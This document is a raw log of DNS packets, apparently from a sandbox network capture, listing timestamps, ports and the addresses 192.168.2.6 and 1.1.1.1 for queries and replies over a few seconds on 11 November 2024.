Nov 11, 2024 18:13:36.040296078 CET	58994	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.043292999 CET	50590	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.043519020 CET	58181	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.043718100 CET	60181	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.043890953 CET	63827	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.044085026 CET	61452	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.044228077 CET	59556	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.044629097 CET	57645	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.045100927 CET	52619	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.050348997 CET	53	58994	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.050421000 CET	59350	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.052844048 CET	53	60181	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.053086996 CET	58282	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.053237915 CET	53	63827	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.054357052 CET	53	50590	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.055923939 CET	53	57645	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.056080103 CET	60278	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.057113886 CET	52042	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.057595968 CET	50057	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.059895039 CET	58237	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.060726881 CET	64930	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.060992002 CET	53	59350	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.062083960 CET	53	59556	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.063330889 CET	53	58282	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.066664934 CET	53	60278	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.067591906 CET	53	50057	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.068877935 CET	53	52619	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.070986032 CET	53	64930	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.075432062 CET	53	58181	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.075656891 CET	53	61452	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.078699112 CET	53	58237	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.084989071 CET	63864	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.086456060 CET	50100	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.087222099 CET	51958	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.087630033 CET	53	52042	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.089874029 CET	54044	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.090091944 CET	65187	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.090306044 CET	62605	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.090553045 CET	62218	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.090723038 CET	62491	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.096596956 CET	53	50100	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.099637985 CET	53	63864	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.100167036 CET	53	62605	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.100500107 CET	53	54044	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.100537062 CET	53	62218	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.101150036 CET	53	65187	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.108623981 CET	53457	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.118704081 CET	53	51958	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.119318008 CET	53	53457	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.121424913 CET	53	62491	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.123994112 CET	50051	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.155756950 CET	53	50051	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.159653902 CET	50739	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.169064045 CET	52113	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.169717073 CET	53	50739	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.169759989 CET	58352	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.170139074 CET	57300	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.170646906 CET	50838	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.171174049 CET	62839	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.171478987 CET	51164	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.179914951 CET	53	52113	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.180984020 CET	53	57300	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.182895899 CET	53	58352	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.201344967 CET	53	50838	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.202920914 CET	53	62839	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.203222036 CET	53	51164	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.221884966 CET	62958	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.254195929 CET	53	62958	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.259588003 CET	64262	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.261053085 CET	53960	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.264192104 CET	60721	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.264869928 CET	50632	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.265335083 CET	52013	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.272152901 CET	62649	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.272319078 CET	53	53960	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.274689913 CET	53	52013	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.274991989 CET	53	50632	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.291142941 CET	53	64262	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.294702053 CET	53	60721	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.305183887 CET	53	62649	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.474531889 CET	61694	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.493403912 CET	64793	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.543286085 CET	54014	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.553842068 CET	65498	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.581387997 CET	51748	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.587686062 CET	58525	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.590895891 CET	64012	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.592047930 CET	53	51748	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.592890978 CET	53	64793	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.597371101 CET	53	58525	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.601305008 CET	53	64012	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.602828026 CET	57873	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.606230974 CET	61501	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.617609978 CET	53	61501	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.631724119 CET	54514	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.634236097 CET	56422	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.637444973 CET	49933	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.641716957 CET	58041	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.646701097 CET	53	49933	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.647540092 CET	61517	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.654058933 CET	53	58041	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.656850100 CET	53	61517	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.663134098 CET	53	54514	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.665376902 CET	53	61694	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.667938948 CET	53	56422	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.689914942 CET	59779	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.704417944 CET	61030	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.706629992 CET	54093	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.710891008 CET	61490	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.714027882 CET	53	61030	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.721419096 CET	53	61490	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.727772951 CET	53	59779	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.731254101 CET	49628	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.737186909 CET	53	54093	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.759833097 CET	57104	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.760807037 CET	52745	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.763194084 CET	53	49628	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.772769928 CET	53	65498	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.791706085 CET	53	57104	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.792052984 CET	53	54014	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.793842077 CET	53	52745	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.814865112 CET	50979	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.824191093 CET	53	57873	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.826045990 CET	53	50979	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.832103968 CET	50676	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.844719887 CET	53	50676	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.901961088 CET	54635	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.924376011 CET	59536	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.934045076 CET	53	54635	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.937700033 CET	53	59536	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.948390007 CET	64717	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.952666044 CET	51439	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.970150948 CET	53	51439	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.979583025 CET	53	64717	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.993355989 CET	49191	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:37.024982929 CET	53	49191	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:37.079809904 CET	55161	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:37.090826035 CET	53	55161	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:37.139149904 CET	63119	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:37.145134926 CET	58186	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:37.174808979 CET	53	63119	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:37.179389954 CET	53	58186	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:37.182558060 CET	62299	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:37.203246117 CET	63907	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:37.216618061 CET	53	62299	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:37.218911886 CET	59063	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:37.226330996 CET	53	63907	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:37.231194019 CET	53	59063	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:37.247178078 CET	61693	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:37.282207966 CET	49572	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:37.293128014 CET	53	49572	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:37.438110113 CET	53	61693	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.812305927 CET	55898	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.816901922 CET	64757	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.827450991 CET	51668	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.828238010 CET	53	64757	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.834781885 CET	54673	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.837096930 CET	53	51668	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.843009949 CET	53	55898	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.851094007 CET	53711	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.851807117 CET	62815	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.854623079 CET	59629	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.864375114 CET	53	59629	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.867352009 CET	53	54673	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.882210970 CET	53	62815	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.882762909 CET	53	53711	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.898005962 CET	53895	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.904134035 CET	49152	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.904647112 CET	53953	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.910975933 CET	52131	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.914205074 CET	53	53953	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.916891098 CET	53	53895	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.932883978 CET	55072	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.933557034 CET	56484	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.934087992 CET	58640	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.934683084 CET	61285	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.935233116 CET	55722	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:39.935487986 CET	53	49152	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.941792965 CET	53	55072	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.942199945 CET	53	52131	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.942892075 CET	53	56484	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.944128036 CET	53	61285	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.945108891 CET	53	55722	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:39.965632915 CET	53	58640	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.029721022 CET	50765	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.032075882 CET	51629	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.033957958 CET	57365	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.039402962 CET	53	50765	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.044430017 CET	53	57365	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.050388098 CET	53	51629	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.469959021 CET	58455	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.470510006 CET	63043	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.470721960 CET	49380	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.471013069 CET	56962	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.471175909 CET	64800	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.480603933 CET	53	58455	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.481663942 CET	53	49380	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.481683016 CET	53	64800	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.481868029 CET	53	56962	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.501646042 CET	53	63043	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.503146887 CET	61321	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.503499031 CET	53664	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.505188942 CET	56020	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.505359888 CET	62552	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.505523920 CET	52991	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.505660057 CET	65021	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.505814075 CET	58420	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.505965948 CET	59075	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.506105900 CET	63933	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.506268024 CET	54075	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.506429911 CET	51591	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.506593943 CET	53593	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.506738901 CET	50815	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.506938934 CET	50152	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.507266045 CET	62886	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.507451057 CET	63879	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.507605076 CET	64960	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.507740021 CET	49612	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.507896900 CET	50450	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.508048058 CET	52359	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.508220911 CET	54657	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.508379936 CET	57869	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.508526087 CET	50451	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.508702040 CET	59158	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.508847952 CET	55721	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.508996964 CET	55525	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.512447119 CET	65041	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.513068914 CET	65121	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.514965057 CET	53	52991	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.515095949 CET	53	65021	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.515690088 CET	53	56020	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.515783072 CET	53	62552	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.516697884 CET	53	58420	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.516779900 CET	53	64960	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.517174006 CET	53	59075	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.517451048 CET	53	62886	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.517755985 CET	53	49612	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.517976999 CET	53	52359	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.519011974 CET	53	50451	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.519285917 CET	53	55525	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.519296885 CET	53	63879	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.519373894 CET	53	54075	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.519864082 CET	53	50450	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.520071030 CET	53	65121	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.520138979 CET	53	55721	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.523436069 CET	53	63933	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.523555040 CET	53	51591	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.523883104 CET	62960	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.524097919 CET	60975	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.527415037 CET	50451	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.528016090 CET	60311	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.528536081 CET	52227	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.530567884 CET	53292	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.531161070 CET	58639	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.531856060 CET	50782	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.531936884 CET	53767	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.533642054 CET	53	60975	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.535123110 CET	53	61321	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.535919905 CET	53	53664	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.537290096 CET	53	50152	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.537934065 CET	53	53593	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.538218021 CET	53	50451	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.538958073 CET	53	50815	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.538989067 CET	53	60311	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.539906025 CET	53	54657	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.539937019 CET	53	59158	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.540935993 CET	53	57869	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.541347027 CET	53	58639	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.541356087 CET	53	53292	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.542314053 CET	53	53767	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.542620897 CET	53	65041	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.554011106 CET	57298	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.554274082 CET	55797	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.556709051 CET	53	62960	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.559793949 CET	53	52227	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.562025070 CET	53	57298	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.563221931 CET	53	50782	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.565130949 CET	53	55797	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.688395023 CET	59102	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.699029922 CET	53	59102	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.868772030 CET	55020	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.871701956 CET	64507	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.873779058 CET	65455	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.874294996 CET	63976	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.875107050 CET	55106	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.875722885 CET	49804	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.876954079 CET	53670	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.877285004 CET	54963	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.877465963 CET	60132	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.877780914 CET	52173	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.879304886 CET	53	55020	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.882289886 CET	53	64507	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.882989883 CET	53	55106	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.884649992 CET	53	63976	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.885114908 CET	53	65455	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.885462999 CET	52817	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.885714054 CET	64014	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.887087107 CET	53	49804	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.887775898 CET	53	52173	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.893357038 CET	54557	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.895664930 CET	53	64014	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.896040916 CET	53	52817	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.903691053 CET	53	54557	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.908438921 CET	53	53670	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.909316063 CET	53	60132	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.910037041 CET	53	54963	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.953562021 CET	54678	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.953941107 CET	58757	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.954715967 CET	54539	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.956357002 CET	50649	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.964214087 CET	53	54678	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.965205908 CET	62394	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.965380907 CET	52831	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.965878963 CET	53	58757	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.967185020 CET	53	50649	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.976047039 CET	53	62394	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.981863976 CET	65301	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.982069969 CET	49154	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.985989094 CET	53	54539	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:40.993200064 CET	59170	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.993321896 CET	49301	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:40.996323109 CET	53	52831	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.003628016 CET	53	49301	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.004200935 CET	58052	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.004396915 CET	55968	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.014291048 CET	53	65301	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.014874935 CET	53	55968	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.014905930 CET	53	49154	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.015192986 CET	53	58052	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.024404049 CET	53	59170	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.047667980 CET	59405	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.057221889 CET	56878	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.061289072 CET	60801	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.061706066 CET	63622	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.062974930 CET	50935	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.066667080 CET	53	56878	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.070216894 CET	53	50935	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.071923018 CET	53	63622	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.080209970 CET	53	59405	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.084691048 CET	57953	53	192.168.2.6	1.1.1.1
